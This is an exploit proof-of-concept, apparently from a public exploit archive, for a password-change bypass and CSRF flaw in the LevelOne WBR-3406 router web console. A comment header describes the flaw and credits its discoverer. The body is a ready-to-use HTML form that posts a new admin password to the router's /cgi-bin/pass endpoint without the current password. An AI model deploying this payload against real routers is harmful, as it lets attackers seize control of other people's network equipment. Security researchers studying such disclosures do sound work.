# -----------------------------------------------------------# WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability# This PoC code should do two main things:# 1. Cross Site Request Forgery (For more information, just google it).# 2. This code change to new password without know the current password.# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password# the application ignore that and change the password without even entering the old / current password.# Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com># Date 17/08/2012# Vendor site - http://www.level1.com/# ISRAEL# -----------------------------------------------------------# Author will be not responsible for any damage.# -----------------------------------------------------------# PoC EXPLOIT# -----------------------------------------------------------<html><body><form action="http://192.168.123.254/cgi-bin/pass" method="POST"><inputtype="hidden" name="rc" value="@"/><inputtype="hidden" name="Pa" value="1234567"/><inputtype="hidden" name="P1" value="1234567"/><inputtype="hidden" name="rd" value="atbox"/><inputtype="submit" value="Submit form"/></form></body></html># -----------------------------------------------------------
